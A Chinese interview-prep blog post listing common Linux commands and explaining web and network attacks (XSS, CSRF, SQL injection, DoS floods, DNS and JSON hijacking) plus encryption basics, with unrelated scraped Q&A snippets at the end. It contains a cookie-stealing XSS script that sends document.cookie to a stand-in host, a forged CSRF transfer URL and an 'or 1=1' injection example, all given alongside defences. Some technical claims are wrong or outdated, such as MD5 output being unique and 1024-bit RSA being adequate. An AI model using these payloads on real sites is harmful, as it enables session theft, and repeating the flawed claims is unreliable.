Linux常用命令和网络攻击面试总结

2023-11-05

Linux

浏览目录下的文件列表 ls [选项]

创建文件目录命令 mkdir [选项] 目录名称

删除空文件夹 rmdir

删除文件/目录 rm -rf 强制删除

复制文件/目录

​ cp -r 目录1 目录2 递归复制 目录1所有的文件和文件夹到目录2

​ cp -ri 目录1 目录2 执行复制时覆盖原有目录前询问用户

移动文件,修改文件名

​ mv 文件1 文件2 (修改文件名)

​ mv 目录1 目录2 (将目录1的文件移动到目录2中)

查找文件或目录:find /root -name ‘ins’

​ 创建文件 touch 文件名

​ 查看,编辑文件 vi 文件名 --打开文件 --输入i,a,o 修改文件

:wq! 保存并退出 :q! 强制退出

在vi编辑下 退出insert编辑模式,输入

​ L 关标移到最后一行

​ 数字+ 向上移多少行 示例:1+

​ dd 删除当前行

查看,编辑文件

​ cat 文件名 (打开一个较小的文件)

​ cat > 文件名 (打开一个新的文件) 【按下Ctrl+****C退出】

查看文件开头内容

​ head -n 文件名 n表示行数,默认为10行

查看文件的结尾

​ tail -f 文件名 动态加载某个文件的内容(常用于查看日志) 【按Ctrl+C退出】

​ tail -n 文件名 查看文件最后几行 n表示行数,默认为10行

权限模式

​ u,g,o:拥有者,同组用户,其他组用户

​ +,-:赋予,收回权限

​ r,w,x:读,写,执行权限

​ 示例: chmod –r 文件夹名称

​ 数字模式

​ 使用三位二进制数表示权限操作

​ chmod abc file

​ 其中a,b,c各为一个数字,a表示User,b表示Group,c表示Other的权限。

​ r=4,w=2,x=1

​ 若要rwx(可读、可写、可执行)属性,则4+2+1=7

​ 若要rw-(可读、可写、不可执行)属性,则4+2=6

​ 若要r-w(可读、不可写、可执行)属性,则4+1=5

​ 范例:

​ chmod a=rwx file 和 chmod 777 file 效果相同

​ chmod ug=rwx,o=x file 和 chmod 771 file 效果相同

​ 若用chmod 4755 filename可使此程式具有root的权限

​ 示例:chmod 753 –r F01

​ 查看进程 ps

​ 杀死进程 kill -9 pid -9表示强迫中止

​ 进程文件.sh文件

安装解压

​ 解压gzip包 tar -zxvf 包名

​ 解压bz包 tar -jxvf 包名

​ 解压普通包 tar -xvf 包名

ifconfig查看ip地址

已经启动了项目,更新jar包,需要重新部署的情况

1.查看进程 ps -ef或者更精准 ps -ef|grep xxx

2.杀死进程 kill -9 进城号

3.删除旧的jar包 rm 文件名

4.上传新fu’z的jar包 2.(用命令或者直接拖动等都行)

5.输入启动命令启动jar包

启动命令:4)nohup Java -jar xxx.jar >aa.log //指定输出日志文件,意是不挂断运行命令,当账户退出或终端关闭时,程序仍然运行

XSS跨站脚本攻击

将一段Html和JavaScript代码注入到用户浏览的网页上。

如何注入?

譬如在某个评论里,发表一段如下代码:(可以尝试在csdn上试试),如果该网站通过cookie管理用户名密码,那访问含有该脚本的链接后,会携带cookie到abc.com中,攻击者即可获得cookie数据。

 <script>
   	location.href="//abc.com/c="+document.cookie</script>

 </script>
  1. 窃取 Cookie:黑客可以在 JavaScript 中通过 document.cookie 获得 Cookie 信息。
  2. 未授权操作:以利用 JavaScript 的特性,直接代替用户在 HTML 进行各类操作。
  3. 按键记录和钓鱼:黑客还可以通过修改 DOM,伪造一个登录框,来诱导用户在本不需要登录的页面,去输入自己的用户名和密码。

防范的策略

  1. 利用浏览器的同源策略。不过浏览器这种东西本身就不是绝对可靠, 同源策略也不是没法破解。
  2. 设置cookie为HttpOnly,即防止恶意脚本获取cookie
  3. 使用正则表达式,过滤特殊字符,这也是很多可以评论的网站常见的手段之一。

httponly

HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险

支持HttpOnly的浏览器检测到包含HttpOnly标志的cookie,并且客户端脚本代码尝试读取该cookie,则浏览器将返回一个空字符串作为结果。这会通过阻止恶意代码(通常是XSS)将数据发送到攻击者的网站来使攻击失败。

CSRF跨站请求伪造

攻击者通过骗取用户访问一个曾经认证过的网站,然后执行一些非法操作,如转钱。譬如某个支付机构设计的一个低能的转账请求如下:

http://abc.com?account=A&money=100

并且,用户曾对abc.com认证过,譬如记住账号密码,此时攻击者可以在它的网站伪造个链接或者放一张图片,其链接如下,由于攻击者曾认证过,该操作被视为合法,攻击者获得10元。

http;//abc.com?account=攻击者&money=100

咋一看CSRF和XSS很像,其实确实有点像,不过XSS利用的是用户对网站的信任,而CSRF利用的是服务对用户浏览器的信任。

CSRF的防范策略

  1. 一种是利用HTTP报文中的Referer字段,用于标识请求的来源地址,通过检查Referer字段,让只有合法的请求来源才能有执行的权限。
  2. 第二种则是token,最简单的方式服务端随机出随机数,并要求每个请求都带上。
  3. 第三种则是输入验证码,这种手段也比较常见了。

CSRF 和 XSS 的区别

1、CSRF是跨站请求伪造; XSS是跨域脚本攻击。
2、CSRF需要用户先登录网站A,获取cookie; XSS不需要登录。
3、CSRF是利用网站A本身的漏洞,去请求网站A的api; XSS是向网站A注入JS代码,然后执行JS里的代码,篡改网站A的内容。(XSS利用的是站点内的信任用户,而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。你可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求

SQL注入

SQL注入也是比较烂大街的攻击手段了,利用的是SQL语句的执行漏洞。如下,当我account填入A or 1=1,pwd填入c or 1 =1,则变成条件永远成立了,从而可以执行某个用户的操作。

select * from user where account=A and pwd = B

select * 
from user 
where (account=A or 1 =1) and (pwd = B or 1 =1)

这种攻击也比较好处理,SQL语句预编译,正则过滤请求中的特殊字符,或者对一些特殊符号预先转换。

DOS攻击、DDOS攻击

https://blog.csdn.net/wenjianfeng/article/details/90096514

DoS 攻击:攻击者不断地提出服务请求,让合法用户的请求无法及时处理

DDoS 攻击:攻击者使用多台计算机或者计算机集群进行 DoS 攻击

DOS举例:SYN-洪泛攻击

DDOS举例:攻击者会对某些APP或网站植入一些恶意代码,譬如说curl www.mukedada.com,用户在使用这款APP或网站时,会自动请求www.mukedada.com这个网站,如果这款APP或网站的活跃用户数很多,那么这个网站就会受到很多莫名的请求。

相同之处:都是攻击者想非法占用被攻击者的一些资源,比如如:带宽,CPU,内存等等,使得被攻击者无法响应正常用户的请求。

不同之处

DOS(拒绝服务):为一台主机进行攻击。目的是使得计算机或者网络我无法提供正常服务。最常见的DOS攻击有计算机网络带宽攻击和连通性的攻击。

**DDOs(分布式拒绝服务):群体攻击。**借助CS(客户端/服务器)技术,将多个计算机联合起来作为一个攻击平台,从而对一个或多个目标法功攻击。

DDOS分布式拒绝服务攻击

它利用多台服务器在某个瞬间内发送大量请求至某个目标服务器中,从而耗费你的服务器资源,让你的服务瘫痪。

这种一般比较很难解决,如果是针对ip进访问限制,有时会误伤友军。

DDOS最常见的攻击形式

SYN/ACK Flood 最经典最有效的利用 TCP 协议的 DDos 攻击手段,可通杀各种系统的网络服务:

SYN 攻击(半连接攻击)

在三次握手过程中,服务器发送 SYN-ACK 之后,收到客户端的 ACK 之前的 TCP 连接称为半连接(half-open connect)。此时服务器处于 SYN_RCVD 状态。当收到 ACK 后,服务器才能转入 ESTABLISHED 状态.

SYN攻击指的是,攻击客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送SYN包,服务器回复确认包,并等待客户的确认。由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求被丢弃,导致目标系统运行缓慢,严重则会引起网络堵塞甚至系统瘫痪。

SYN 攻击是一种典型的 DoS/DDoS 攻击。

解决

可以通过缩短 SYN Timeout 时间,降低服务器负荷;设置 SYN Cookie,记录请求连接的 IP地址,丢弃来自某个/些 IP 的重复 SYN 报文;

ACK Flood

ACK Flood说的就是TCP正常连接后,由于大量主机发送请求,服务端忙于接受报文,判断请求状态,向应从请求(发送rst应答或者ack应答),从而无法正常执行其他请求,最终让其他服务瘫痪。

没有针对性的防御方案,可以通过分析请求的报文,设定专门的应答策略。

TCP 全连接攻击

这种攻击方式也是成本也是比较高的,首先你的浏览器一般默认的TCP链接最大为8,再者你的服务器TCP连接数也会有一个限制,这意味你需要很多主机来模拟这种请求。对于攻击目标而言,目标服务器的 TCP 连接数也是有限的,一旦你的服务压不过攻击者,那你的网站则会非常缓慢甚至无法访问。

解决

根据实际情况设置TCP 新建连接速率、异常报文数阈值,超过该阈值启动防御;针对源进行统计,如果某个源 IP 在指定的时间间隔内发起的 TCP 新建连接数超过了阈值,则将该源 IP 加入黑名单; 针对报文数进行检查,如果特定时间内通过的报文数小于阈值则判定为异常会话,如果指定时间内某个源 IP 异常会话超过了阈值,则该源 IP 加入黑名单。

CC

(Challenge Collapsar)攻击又称HTTP Flood,这种请求也不是很好处理,应为它就像量比较大的正常请求,不过有迹可循的是,在某个时间段内,它集中于攻击网站里头需要较长计算时间的请求,使你的服务达到瓶颈。

解决

网站页面静态化,针对开销较大的资源,针对某个ip限制访问问频率、避免数据库慢查询、选择适合的缓存、消息队列等。

ICMP洪水

即 Internet 控制报文协议,在短时间内,攻击者向目的主机发送大量 Ping 包,消耗主机资源,主机资源耗尽后就会瘫痪或者无法提供其他服务。

解决

通过禁用ICMP解决,有些网站你会发现虽然ping不通,但它正常服务是没有问题的

UDP 洪水

UDP 是无连接状态的协议,攻击者发送大量伪造源IP地址的小 UDP 包,冲击 DNS 服务器(即 UDP DNS Query Flood)或 Radius 认证服务器、流媒体视频服务器等,将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪,是一个消耗双方资源的攻击。

解决

判断包大小,如果是大包攻击,则使用防止 UDP 碎片方法:根据攻击包大小设定包碎片重组大小,通常不小于1500;在极端情况下,可以考虑丢弃所有 UDP 碎片。攻击端口为业务端口:根据该业务 UDP 最大包长设置 UDP 最大包大小以过滤异常流量;攻击端口为非业务端口则丢弃所有 UDP 包,可能会误伤正常业务;建立 UDP 连接规则,要求所有去往该端口的 UDP 包,必须首先与 TCP 端口建立 TCP 连接。

DNS劫持

DNS是通过访问的URL解析ip。没有DNS,我们上网需要记忆每个网站的IP地址而不是他们的域名。

但是DNS提供服务用来将域名转换成IP地址,但不能确保解析结果是否被更改等等,比如:

  • 本地计算机中的木马修改hosts文件
  • 本地计算机中的木马修改DNS数据包中的应答
  • 网络中的节点(如路由器)修改DNS数据包中的应答
  • 网络中的节点(如运营商)修改DNS数据包中的应答

被更改之后,可能就会访问某些恶意地址

预防:

1.经常杀毒

1、为域名注册商和注册用邮箱设置复杂密码且经常更换。使用单独的DNS服务,也需要对密码进行上述设置。同时注意不要在多个重要注册地使用相同的用户名和密码;
  2、将域名更新设置为锁定状态,不允许通过DNS服务商网站修改记录,使用此方法后,需要做域名解析都要通过服务商来完成,时效性较差;
  3、定期检查域名帐户信息、域名whois信息,査看事件管理器,清理Web网点中存在的可疑文件。每天site网站检查是否有预期外网页。详细检查网站索引和外链信息,有异常一定要检查清楚;
  4、加强网站的防SQL注入功能,SQL注入是利用SQL语句的特点向数据库写内容,从而获取到权限的方法;
  5、配置Web站点文件夹及文件操作权限。Windows网络操作系统中,使用超级管理员权限, 对Web站点文件及文件夹配置权限,多数设置为读权限,谨慎使用写权限,如果无法获取超级管理员权限,这样***程序便无法生根,网站域名被劫持的可能便可以降低很多;
  6、利用事务签名对区域传送和区域更新进行数字签名;
  7、删除运行在DNS服务器上的不必要服务,如FTP;
  8、在网络外围和DNS服务器上使用防火墙服务。将访问限制在那些DNS功能需要的端口/服务上。

解决:

阿里、腾讯等头部互联网厂商开始推出了httpDNS服务,来了一招釜底抽薪,虽然这项技术的名字中还有DNS三个字母,但实现上和原来但DNS已经是天差地别,通过这项技术让DNS变成了在http协议之上的一个应用服务。

1、立即修改域名服务商和邮箱密码,使用复杂度高的密码且经常更换;
  2、删除不属于你的DNS解析,恢复DNS设置;
  3、关闭域名的泛解析,进入域名管理后台就可以点击我们的域名找到带号的域名解析,删除掉就可以了;
  4、如果使用的是第三方DNS服务,应立即修改第三方DNS服务端帐户密码,锁定帐户信息,开启帐户短信邮箱类提醒;
  5、看网站整体代码是否被篡改。这是解决域名劫持问题之后对自己的网站进行全面排查,从而做到完美的清除垃圾页面,保证网站的安全性;
  6、收集全部被非法添加的页面并设置404,使用百度站长平台工具提交死链。因为那些网站的死链就是我们的垃圾页面,所以我们要把这些死链都解决。我们在页面举报内容处写上网站被恶意
**就可以了;
  7、如果该服务商下域名经常出现被劫持事件,可考虑更换更安全稳定的服务商。有能力的网站可自建DNS服务自主运营。

JSON劫持

JSON是一种轻量级的数据交换格式。

​ 恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者,这就是JSON劫持的大概含义。

​ 一般来说进行劫持的JSON数据都是包含敏感信息或者有价值的数据。

一、接受请求时检查referer来源。
二、在请求中添加 Token并在后端进行验证。
三、严格过滤callback函数名及JSON里数据的输出。

暴力破解—密码

这个一般针对密码而言,弱密码(Weak Password)很容易被别人(对你很了解的人等)猜到或被破解工具暴力破解。

解决方案 密码复杂度要足够大,也要足够隐蔽 限制尝试次数,加验证码

对称加密 AES DES 3DES

优缺点:

优点: 加速密码快

**缺点:**密钥的传递和保存是一个问题,参与加密和解密的双方使用的密钥是一样的,这样密钥就很容易泄露

在实际的操作过程中,因为都是针对二进制的操作,采取补操作可以用异或操作来代替,另外,在其中的某些步骤还可以那数据和密钥进行位运算,具体不同加密算法实现不同

对称加密算法(AES DES 3DES)

对称加密算法是指加密和解密采用相同的密钥,是可逆的(即可解密)。

DES数据加密标准

目前已经被证明可以被暴力破解。所谓暴力破解,就是遍历所有可能的密钥解析数据的方法。举个例子,已知张三和李四传输的是中文,加密算法是 DES,那么拿出一小段数据进行暴力破解,尝试所有的密钥,如果能成功解析出中文词语(词语在词库中可以查到),那么说明破解成功。

DES 采用的 56 位密钥,每次计算加密 64 位的数据。

DES 采用的 56 位密钥,每次计算加密 64 位的数据。在实际的暴力破解过程中,比我上面描述的行为更加复杂。一个通用的暴力破解算法需要较大的算力,一些 DES 的破解算法需要 239-241 次操作。这个数量级的操作,目前还没有超出人类计算能力的极限,如果显卡好一点,或者机器多一些还是可以承受的。

因此后续很多组织开始利用 3 次 DES 操作来增加破解成本,具体的做法是用 3 个 56 位的密钥组合成一个 168 位的密钥,对数据进行 3 次 DES 操作,这样做大大增加了暴力破解的成本。但是目前针对 3DES 仍然有一些攻击策略,需要 290 次计算和 288 位内存,虽然有一定概率被攻破,但是成本非常高。

AES加密

AES加密算法是密码学中的高级加密标准,采用的是对称分组密码体制,密钥长度的最少支持为128,AES加密算法是美国联邦政府采用的区块加密标准,这个标准用来替代原先的DES,已经被多方分析且广为全世界使用。

非对称加密(RSA、DSA、ECC)

非对称加密算法是指加密和解密采用不同的密钥(公钥和私钥),因此非对称加密也叫公钥加密,是可逆的(即可解密)。公钥密码体制根据其所依据的难题一般分为三类:大素数分解问题类、离散对数问题类、椭圆曲线类

RSA加密算法是基于一个十分简单的数论事实:将两个大素数相乘十分容易,但是想要对其乘积进行因式分解极其困难,因此可以将乘积公开作为加密密钥。虽然RSA的安全性一直未能得到理论上的证明,但它经历了各种攻击至今未被完全攻破。

优缺点

优点 : 加密和解密的密钥不一致,公钥是可以公开的,只需保证私钥不被泄露即可,这样就密钥的传递变的简单很多,从而降低了被破解的几率。

缺点 : 加密速度慢

RSA加密算法既可以用来做数据加密,也可以用来数字签名。

–数据加密过程:发送者用公钥加密,接收者用私钥解密(只有拥有私钥的接收者才能解读加密的内容)

–数字签名过程:甲方用私钥加密,乙方用公钥解密(乙方解密成功说明就是甲方加的密,甲方就不可以抵赖)

常见的应用场景

非对称加密算法目前广泛应用到各个领域,比如

  • HTTPS 协议的握手和交换密钥过程需要非对称加密算法;SSH 的通信需要非对称加密算法。
  • 另外,证书的生程,比如利用证书实现 git 账号的免密操作也是基于非对称加密算法。
  • 在线合同、数字货币的签名等都需要非对称加密算法。

总结

对称加密用同样的密钥,安全系数不够。非对称加密,用公钥 + 私钥的方式加强了安全系数。

那么是不是我们所有的加密的应用都应该用非对称加密呢?通常情况,非对称加密需要更多的运算资源。因此很多协议使用非对称加密解决最核心的安全问题,再用对称加密解决其他问题。

以 HTTPS 协议为例,客户端和服务器之间会先用非对称加密交换临时对称加密密钥,然后之后的通信会以对称加密执行,直到连接结束。也就是非对称加密仅仅存在于 HTTPS 连接建立后,用于交换密钥(对称加密密钥)的少数几次传输中。这样用非对称加密解决最核心的安全问题:交换对称加密密钥;然后利用对称加密进行数据的传输。

3、线性散列算法算法(MD5、SHA1、HMAC)

MD5全称是Message-Digest Algorithm 5(信息摘要算法5),单向的算法不可逆(被MD5加密的数据不能被解密)。MD5加密后的数据长度要比加密数据小的多,且长度固定,且加密后的串是唯一的。

适用场景:常用在不可还原的密码存储、信息完整性校验等。

信息完整性校验:典型的应用是对一段信息产生信息摘要,以防止被篡改。如果再有一个第三方的认证机构,用MD5还可以防止文件作者的“抵赖”,这就是所谓的数字签名应用。

SHA-1 与 MD5 的比较

SHA-1摘要比MD5摘要长32 位,所以SHA-1对强行攻击有更大的强度,比MD5更安全。使用强行技术,产生任何一个报文使其摘要等于给定报摘要的难度对MD5是2128数量级的操作,而对SHA-1则是2160数量级的操作。

在相同的硬件上,SHA-1 的运行速度比 MD5 慢。

4、混合加密

由于以上加密算法都有各自的缺点(RSA加密速度慢、AES密钥存储问题、MD5加密不可逆),因此实际应用时常将几种加密算法混合使用。

例如:RSA+AES:

采用RSA加密AES的密钥,采用AES对数据进行加密,这样集成了两种加密算法的优点,既保证了数据加密的速度,又实现了安全方便的密钥管理。

那么,采用多少位的密钥合适呢?一般来讲密钥长度越长,安全性越高,但是加密速度越慢。所以密钥长度也要合理的选择,一般RSA建议采用1024位的数字,AES建议采用128位即可。

5、Base64

严格意义讲,Base64并不能算是一种加密算法,而是一种编码格式,是网络上最常见的用于传输8bid字节代码的编码方式之一。

Base64编码可用于在HTTP环境下传递较长的标识信息,Base编码不仅不仅比较简单,同时也据有不可读性(编码的数据不会被肉眼直接看到)。

摘要算法:HTTPS如何方式数据发生了篡改?

作用:防止数据被篡改。

摘要算法:实现数据完整性,能够为数据生成独一无二的指纹,指纹用于校验数据的完整性,解决了被篡改的风险。

过程
1、客户端发送明文前,会通过摘要算法算出明文的指纹,发送时明文和指纹一同加密,发送给服务器。

2、服务器解密后,用相同的摘要算法算出发送过来的明文,通过比较客户端携带的指纹和当前指纹做比较,若相同,则说明数据是完整的。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Linux常用命令和网络攻击面试总结 的相关文章

  • 我应该使用哪个 Linux 发行版作为 Xen 主机? [关闭]

    Closed 这个问题是基于意见的 help closed questions 目前不接受答案 我为家庭办公室订购了一台服务器 我想用 Xen 对其进行分区 我认为这将使事情保持干净并且更容易维护 我将运行 MySQL PostgreSQL
  • Linux命令列出所有可用命令和别名

    是否有一个 Linux 命令可以列出该终端会话的所有可用命令和别名 就好像您输入 a 并按下 Tab 键一样 但针对的是字母表中的每个字母 或者运行 别名 但也返回命令 为什么 我想运行以下命令并查看命令是否可用 ListAllComman
  • perf stat中的cycles注释是什么意思

    8 014196 task clock 0 004 CPUs utilized 204 context switches 0 025 M sec 32 cpu migrations 0 004 M sec 0 page faults 0 0
  • 无关的库链接

    我有一个可能有点愚蠢的问题 因为我很确定我可能已经知道答案了 假设你有静态库A 动态共享库B和你的linux下的程序C 假设库 A 调用库 B 中的函数 并且您的程序调用库 A 中的函数 现在假设 C 在 A 中调用的所有函数都不使用 B
  • 如何获取 linux 实用程序 tail 的源代码?

    这个命令确实非常有用 但是我可以在哪里获取源代码以查看内部发生的情况 thanks tail 实用程序是 Linux 上 coreutils 的一部分 源压缩包 ftp ftp gnu org gnu coreutils coreutils
  • gethostbyname() 或 getnameinfo() 如何在后台工作?

    How gethostbyname or getnameinfo 在后台工作 include
  • InstaPy:“错误,无法确定 64 位 Linux 的正确文件名”

    有人知道如何解决或解决这个问题吗 来自控制台的堆栈跟踪 执行后报告错误 InstaPy Version 0 6 9 Workspace in use home zanettra InstaPy Error unable to determi
  • git在Windows和Linux之间切换后强制刷新索引

    我有一个Windows和Linux共享的磁盘分区 格式 NTFS 它包含一个 git 存储库 约 6 7 GB 如果我只使用Windows or 只使用Linux操作 git 存储库一切正常 但是每次切换系统的时候git status命令将
  • Linux 中热插拔设备时检测设备是否存在

    我正在运行 SPIcode http lxr free electrons com source drivers spi spi omap2 mcspi c在熊猫板上 我想知道其中的哪个功能code http lxr free electr
  • 如何不断刷新屏幕并实时更新[关闭]

    Closed 这个问题需要多问focused help closed questions 目前不接受答案 我想在linux上写一个C程序 不断刷新屏幕并实时更新 例如类似于top终端中的命令 谁能指出我正确的方向 为了保持它跨终端类型的可移
  • 如何在Python中独立于语言安装(linux)获取用户桌面路径

    我找到了 如何找到用户桌面的路径 的几个问题和答案 但在我看来它们都已失效 至少我找到的那些 原因是 如果用户安装的 Linux 不是英语 他或她的桌面很可能位于除 Desktop 例如 对于瑞典语 我相信它是在 Skrivbord 谁知道
  • sleep 0 有特殊含义吗?

    我看到很多用法sleep 0在我的一个客户项目中 代码看起来像这样 while true sleep 0 end 阅读一些像这样的答案this https stackoverflow com questions 3727420 signif
  • 设置 Apache POI 的路径

    我想创建 Excel 文件并使用 java 程序在该文件中写入数据 That is here http www techbrainwave com p 554我在 java 文件所在的位置提取了 Apache POI 并将该路径包含在路径变
  • 让 MongoDB 在 Linux 上监听远程连接

    我已在 Windows 本地计算机上 上成功安装 MongoDB 作为服务 但现在我想将 MongoDb 移动到单独的服务器 所以我将 tarball 解压到网络上的虚拟服务器 运行 Linux 当我从本地计算机使用 PuTTY 连接到服务
  • 在 /dev/input/eventX 中写入事件需要哪些命令?

    我正在开发一个android需要将触摸事件发送到 dev input eventX 的应用程序 我知道C执行此类操作的代码结构如下 struct input event struct timeval time unsigned short
  • 在主目录中安装库

    在 Linux Ubuntu 中 我尝试运行一个工具 但它显示错误 库丢失 我无权在系统中安装任何内容 或者根本无法从我的用户帐户执行 sudo 是否可以在我的主目录 没有 sudo 中安装缺少的库 在我的例子中为 libstdc so 6
  • 如何更改 Ubuntu 14.04 上的 php-cli 版本?

    我是 Linux 新手 在篡改时破坏了一些 php 设置 如果我执行一个包含以下内容的 php 脚本 phpinfo 它显示 php 版本为 5 6 但通过命令行 如果我运行php v它返回 7 0 版本 我想让两个版本匹配 我怎样才能修复
  • 并行运行 make 时出错

    考虑以下制作 all a b a echo a exit 1 b echo b start sleep 1 echo b end 当运行它时make j2我收到以下输出 echo a echo b start a exit 1 b star
  • 嵌入式Linux poll()不断返回

    我有一个特别的问题 当我知道没有什么可读时 民意调查不断返回 因此设置如下 我有 2 个文件描述符 它们构成fd设置民意调查监视 一种用于引脚从高到低的变化 GPIO 另一个用于代理输入 代理输入出现问题 处理的顺序是 启动main函数 然
  • QFileDialog::getSaveFileName 和默认的 selectedFilter

    我有 getSaveFileName 和一些过滤器 我希望当用户打开 保存 对话框时选择其中之一 Qt 文档说明如下 可以通过将 selectedFilter 设置为所需的值来选择默认过滤器 我尝试以下变体 QString selFilte

随机推荐

  • uView在uniapp中样式完全失效问题

    最近开发微信小程序和钉钉小程序 使用uniapp UI库准备使用uView 但是按官网引入之后 在小程序模拟器上样式完全无效 而H5正常 解决方法 由于Hbuilderx版本问题 编译的代码中会多出一行样式 可以更换3 2 16版本 亲测有
  • SecureCRT创建串口连接

    鉴于没有在网上找到很好的图解SecureCRT创建串口连接方式 自己写一篇作为备忘录 同时 便于有同样需求的朋友可以快速方便的创建串口连接方式 一 工具 电脑 串口线和超级终端 本文选择SecureCRT 二 方法步骤 1 点击设备管理 查
  • Android EditText接收扫码枪输入,有时缺位,有时出现两次回车

    最近做Android项目时 需要使用外接扫码枪扫描条码 并且接收条码输入的EditText同时还要能接收商品名称的输入 在开发调试的过程中发现 使用扫码枪时会出现条码信息丢失 或者扫码输入过程中出现两次Enter的情况 问题1 扫码枪扫码后
  • JS逆向 - 破解oklink加密参数及加密数据

    版权声明 原创不易 本文禁止抄袭 转载 侵权必究 目录 一 JS逆向目标 会当临绝顶 二 JS逆向分析 不识庐山真面目 三 JS逆向测试 只缘身在此山中 四 JS反逆向 柳暗花明又一村 五 oklink逆向完整代码下载 六 作者Info 一
  • 微信小程序期末大作业-天使童装商城

    微信小程序期末大作业 天使童装商城 导入即可使用 有轮播图 底部导航 各种童装标签 有首页 分类 优惠券 购物车 个人中心五个导航 适合初学者学习使用 如下图所示 资源链接在末尾 资源下载链接 https download csdn net
  • 拉普拉斯噪声满足ε-差分隐私的定义

    差分隐私的定义如下 给定一个兄弟数据集D和D 他们两者之间至多相差一条数据 然后给定一个映射函数 f D R d f D rightarrow R d
  • 史上最全的WebSettings说明

    setAllowContentAccess boolean allow 是否允许在WebView中访问内容URL Content Url 默认允许 内容Url访问允许WebView从安装在系统中的内容提供者载入内容 setAllowFile
  • 前后端分离的vue项目如何合并?springboot 单体应用

    首先是有这么两个应用 前端是vue项目 后端是springboot 构建的服务端 现在是需求是 这个项目很轻量级 完全没必要部署为两个应用 因此需要重新合并 具体步骤如下 第一步 vue项目先打包 执行命令 npm run build 执行
  • PyQt QSpinBox 详细用法 Python

    PyQt QSpinBox 详细用法 Python PyQt 是一个流行的 Python GUI 编程工具包 它提供了丰富的界面元素和功能 使开发人员能够创建强大的图形用户界面 QSpinBox 是 PyQt 中的一个小部件 它允许用户通过
  • 《Qt 5.9 C++开发指南》第2.1节 UI文件设计与运行机制【完整版】

    2 1 UI文件设计与运行机制 2 1 1 项目文件组成 本节实例程序samp2 1完整源程序下载地址 https download csdn net download hongandyi 10413776 在Qt Creator中新建一个
  • 【读论文】多核学习算法及其在高光谱图像分类中的应用研究进展(2021)

    读论文 多核学习算法及其在高光谱图像分类中的应用研究进展 2021 李广洋 DOI 10 12082 dqxxkx 2021 200536 文章目录 摘要 关键词 结论 该论文研究了什么 摘要 多核学习算法在高光谱图像分类领域占据着十分重要
  • 常用工作方法总结(7S、SWOT分析、PDCA循环、SMART原则、6W2H、时间管理、WBS等)

    文章目录 一 7S规则 1 1 推行7S的目的 1 2 7S的概念 二 二八定律 三 SWOT分析法 四 PDCA循环 五 SMART原则 六 6W2H工作方法 七 时间管理 八 WBS工作分解 九 碎石问题分析法 一 7S规则 1 1 推
  • ER图(实体-联系图)

    概念 E R图也称实体 联系图 Entity Relationship Diagram 提供了表示实体类型 属性和联系的方法 用来描述现实世界的概念模型 构成 ER图有实体 entity 属性 attribute 关系 relationsh
  • 光 线 追 踪

    本文首先将会介绍光线追踪的类别族谱 介绍其公共部分 之后我们会分别对其中的每一个进行详细地剖析 光线追踪 Ray tracing 是一个拥有历史感的词汇 图形学从业者从neutron transport heat transfer和illu
  • 有不用出门就能做的副业吗?

    疫情期间一个00后的女孩在家隔离两周 做视频剪辑赚了4000多 是怎么做的呢 其实操作方法并不难 大周也用这个方法在头条上注册了一个新号 虽然时间不长但也赚了3000多 今天这期内容来给粉丝们分享一下操作流程 如果你也想做 可以给大周扣 8
  • com.alibaba.fastjson.JSONObject cannot be cast to com.alibaba.fastjson.JSONObject报错处理

    一 简介 项目A引用项目B的jar作为依赖 启动的时候也没问题 执行项目B中的一段代码的时候就报错了 代码如下 Map
  • scope=“scope“和作用域插槽

    试试目录 1 之前的使用 测试 1 之前的使用 父组件
  • 后台静默检测U盘并复制U盘内指定文件到电脑指定目录(U盘助手)

    马上期末考试了 老师复习课讲得PPT是精简版的 老师说了之前上课的PPT可以给但是这个不可以 如果得到期末必过了 本想着把我这个自己花了3个多小时做的U盘助手在教室的电脑上运行着 下课我就可以得到PPT了 但是无奈我如此正义凛然 以及信息安
  • js的基本使用

    1 使用方式 引用位置 js的引用位置和css的一样要在HTML中进行 但又有些许不同 例如
  • Linux常用命令和网络攻击面试总结

    Linux 浏览目录下的文件列表 ls 选项 创建文件目录命令 mkdir 选项 目录名称 删除空文件夹 rmdir 删除文件 目录 rm rf 强制删除 复制文件 目录 cp r 目录1 目录2 递归复制 目录1所有的文件和文件夹到目录2